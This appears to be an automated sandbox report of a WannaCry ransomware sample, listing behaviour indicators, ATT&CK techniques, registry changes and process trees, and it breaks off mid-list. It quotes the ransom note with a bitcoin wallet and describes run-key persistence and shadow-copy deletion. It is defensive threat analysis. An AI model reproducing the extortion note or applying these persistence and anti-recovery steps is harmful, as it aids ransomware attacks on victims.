wannacry | hxxp://a[.]co

Analysis

max time kernel
866s
max time network
822s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
18-07-2024 19:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://a.co

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware worm

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Drops startup file 2 IoCs

Processes:

diskpart.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD4C5B.tmp	diskpart.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD4C72.tmp	diskpart.exe

Executes dropped EXE 64 IoCs

Processes:

taskdl.exe@[email protected]@[email protected]taskhsvc.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exe

pid	process
924	taskdl.exe
3340	@[email protected]
1048	@[email protected]
1036	taskhsvc.exe
3360	taskdl.exe
4108	taskse.exe
2440	@[email protected]
3228	taskdl.exe
4332	taskse.exe
3188	@[email protected]
4960	taskse.exe
2432	@[email protected]
3020	taskdl.exe
4000	taskse.exe
1532	@[email protected]
5040	taskdl.exe
3740	taskse.exe
2468	@[email protected]
232	taskdl.exe
4568	taskse.exe
224	@[email protected]
3028	taskdl.exe
1716	taskse.exe
2400	@[email protected]
488	taskdl.exe
4492	taskse.exe
3220	@[email protected]
2904	taskdl.exe
4868	taskse.exe
1812	@[email protected]
4892	taskdl.exe
1080	taskse.exe
4768	@[email protected]
1352	taskdl.exe
3300	taskse.exe
4236	@[email protected]
4044	taskdl.exe
4808	taskse.exe
2524	@[email protected]
1004	taskdl.exe
4992	taskse.exe
1088	@[email protected]
2144	taskdl.exe
224	taskse.exe
2876	@[email protected]
3028	taskdl.exe
1340	taskse.exe
1064	@[email protected]
456	taskdl.exe
3412	taskse.exe
3456	@[email protected]
4716	taskdl.exe
1700	taskse.exe
928	@[email protected]
4812	taskdl.exe
1556	taskse.exe
1580	@[email protected]
1080	taskdl.exe
3488	taskse.exe
2736	@[email protected]
4656	taskdl.exe
2968	taskse.exe
1212	@[email protected]
2536	taskdl.exe

Loads dropped DLL 8 IoCs

Processes:

taskhsvc.exe

pid process

1036 taskhsvc.exe
1036 taskhsvc.exe
1036 taskhsvc.exe
1036 taskhsvc.exe
1036 taskhsvc.exe
1036 taskhsvc.exe
1036 taskhsvc.exe
1036 taskhsvc.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

224 icacls.exe

pid	process
1036	taskhsvc.exe
1036	taskhsvc.exe
1036	taskhsvc.exe
1036	taskhsvc.exe
1036	taskhsvc.exe
1036	taskhsvc.exe
1036	taskhsvc.exe
1036	taskhsvc.exe

pid	process
224	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fjherctahpp827 = "\"C:\\Users\\Admin\\Desktop\\tasksche.exe\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

14 camo.githubusercontent.com
14 raw.githubusercontent.com
132 camo.githubusercontent.com
147 raw.githubusercontent.com

flow	ioc
14	camo.githubusercontent.com
14	raw.githubusercontent.com
132	camo.githubusercontent.com
147	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

diskpart.exe@[email protected]

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	diskpart.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Drops file in Windows directory 4 IoCs

Processes:

UserOOBEBroker.exe

description	ioc	process
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXEWINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeWINWORD.EXEWINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Modifies registry class 2 IoCs

Processes:

msedge.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-514081398-208714212-3319599467-1000\{EC20643C-CF8B-4110-8EA8-C529F1F41C98}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4300 reg.exe
NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\WannaCrypt0r.zip:Zone.Identifier msedge.exe
Suspicious behavior: AddClipboardFormatListener 4 IoCs

Processes:

WINWORD.EXEWINWORD.EXE

pid process

1104 WINWORD.EXE
1104 WINWORD.EXE
4228 WINWORD.EXE
4228 WINWORD.EXE

pid	process
4300	reg.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\WannaCrypt0r.zip:Zone.Identifier	msedge.exe

pid	process
1104	WINWORD.EXE
1104	WINWORD.EXE
4228	WINWORD.EXE
4228	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exetaskhsvc.exe

pid	process
1104	msedge.exe
1104	msedge.exe
1020	msedge.exe
1020	msedge.exe
2052	identity_helper.exe
2052	identity_helper.exe
4864	msedge.exe
4864	msedge.exe
1448	msedge.exe
1448	msedge.exe
2180	msedge.exe
2180	msedge.exe
1036	taskhsvc.exe
1036	taskhsvc.exe
1036	taskhsvc.exe
1036	taskhsvc.exe
1036	taskhsvc.exe
1036	taskhsvc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs

Processes:

msedge.exe

pid	process
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exevssvc.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	4788	WMIC.exe
Token: SeSecurityPrivilege	4788	WMIC.exe
Token: SeTakeOwnershipPrivilege	4788	WMIC.exe
Token: SeLoadDriverPrivilege	4788	WMIC.exe
Token: SeSystemProfilePrivilege	4788	WMIC.exe
Token: SeSystemtimePrivilege	4788	WMIC.exe
Token: SeProfSingleProcessPrivilege	4788	WMIC.exe
Token: SeIncBasePriorityPrivilege	4788	WMIC.exe
Token: SeCreatePagefilePrivilege	4788	WMIC.exe
Token: SeBackupPrivilege	4788	WMIC.exe
Token: SeRestorePrivilege	4788	WMIC.exe
Token: SeShutdownPrivilege	4788	WMIC.exe
Token: SeDebugPrivilege	4788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4788	WMIC.exe
Token: SeRemoteShutdownPrivilege	4788	WMIC.exe
Token: SeUndockPrivilege	4788	WMIC.exe
Token: SeManageVolumePrivilege	4788	WMIC.exe
Token: 33	4788	WMIC.exe
Token: 34	4788	WMIC.exe
Token: 35	4788	WMIC.exe
Token: 36	4788	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4788	WMIC.exe
Token: SeSecurityPrivilege	4788	WMIC.exe
Token: SeTakeOwnershipPrivilege	4788	WMIC.exe
Token: SeLoadDriverPrivilege	4788	WMIC.exe
Token: SeSystemProfilePrivilege	4788	WMIC.exe
Token: SeSystemtimePrivilege	4788	WMIC.exe
Token: SeProfSingleProcessPrivilege	4788	WMIC.exe
Token: SeIncBasePriorityPrivilege	4788	WMIC.exe
Token: SeCreatePagefilePrivilege	4788	WMIC.exe
Token: SeBackupPrivilege	4788	WMIC.exe
Token: SeRestorePrivilege	4788	WMIC.exe
Token: SeShutdownPrivilege	4788	WMIC.exe
Token: SeDebugPrivilege	4788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4788	WMIC.exe
Token: SeRemoteShutdownPrivilege	4788	WMIC.exe
Token: SeUndockPrivilege	4788	WMIC.exe
Token: SeManageVolumePrivilege	4788	WMIC.exe
Token: 33	4788	WMIC.exe
Token: 34	4788	WMIC.exe
Token: 35	4788	WMIC.exe
Token: 36	4788	WMIC.exe
Token: SeBackupPrivilege	2412	vssvc.exe
Token: SeRestorePrivilege	2412	vssvc.exe
Token: SeAuditPrivilege	2412	vssvc.exe
Token: SeTcbPrivilege	4108	taskse.exe
Token: SeTcbPrivilege	4108	taskse.exe
Token: SeTcbPrivilege	4332	taskse.exe
Token: SeTcbPrivilege	4332	taskse.exe
Token: SeTcbPrivilege	4960	taskse.exe
Token: SeTcbPrivilege	4960	taskse.exe
Token: SeTcbPrivilege	4000	taskse.exe
Token: SeTcbPrivilege	4000	taskse.exe
Token: SeTcbPrivilege	3740	taskse.exe
Token: SeTcbPrivilege	3740	taskse.exe
Token: SeTcbPrivilege	4568	taskse.exe
Token: SeTcbPrivilege	4568	taskse.exe
Token: SeTcbPrivilege	1716	taskse.exe
Token: SeTcbPrivilege	1716	taskse.exe
Token: SeTcbPrivilege	4492	taskse.exe
Token: SeTcbPrivilege	4492	taskse.exe
Token: SeTcbPrivilege	4868	taskse.exe
Token: SeTcbPrivilege	4868	taskse.exe
Token: SeTcbPrivilege	1080	taskse.exe

Suspicious use of FindShellTrayWindow 34 IoCs

Processes:

msedge.exe

pid	process
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid	process
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe

Suspicious use of SetWindowsHookEx 43 IoCs

pid	process
1428	MiniSearchHost.exe
1104	WINWORD.EXE
1104	WINWORD.EXE
1104	WINWORD.EXE
1104	WINWORD.EXE
1104	WINWORD.EXE
1104	WINWORD.EXE
1104	WINWORD.EXE
1104	WINWORD.EXE
1104	WINWORD.EXE
1104	WINWORD.EXE
4228	WINWORD.EXE
4228	WINWORD.EXE
4228	WINWORD.EXE
4228	WINWORD.EXE
4228	WINWORD.EXE
4228	WINWORD.EXE
4228	WINWORD.EXE
3340	@[email protected]
1048	@[email protected]
3340	@[email protected]
1048	@[email protected]
2440	@[email protected]
2440	@[email protected]
3188	@[email protected]
2432	@[email protected]
1532	@[email protected]
2468	@[email protected]
224	@[email protected]
2400	@[email protected]
3220	@[email protected]
1812	@[email protected]
4768	@[email protected]
4236	@[email protected]
2524	@[email protected]
1088	@[email protected]
2876	@[email protected]
1064	@[email protected]
3456	@[email protected]
928	@[email protected]
1580	@[email protected]
2736	@[email protected]
1212	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 1020 wrote to memory of 468	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 468	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 4860	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1104	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1104	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 2140	1020	msedge.exe	msedge.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

4028 attrib.exe
3764 attrib.exe

pid	process
4028	attrib.exe
3764	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://a.co
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa9f0d3cb8,0x7ffa9f0d3cc8,0x7ffa9f0d3cd8
2⤵
PID:468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1976 /prefetch:2
2⤵
PID:4860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
2⤵
PID:2140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
2⤵
PID:1576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
2⤵
PID:232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1
2⤵
PID:4788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
2⤵
PID:3340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
2⤵
PID:3468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
2⤵
PID:3588

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6356 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
2⤵
PID:3224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
2⤵
PID:3860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5944 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
2⤵
PID:1568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
2⤵
PID:248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,14574885483872073659,10680278745829534839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
2⤵
PID:1512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
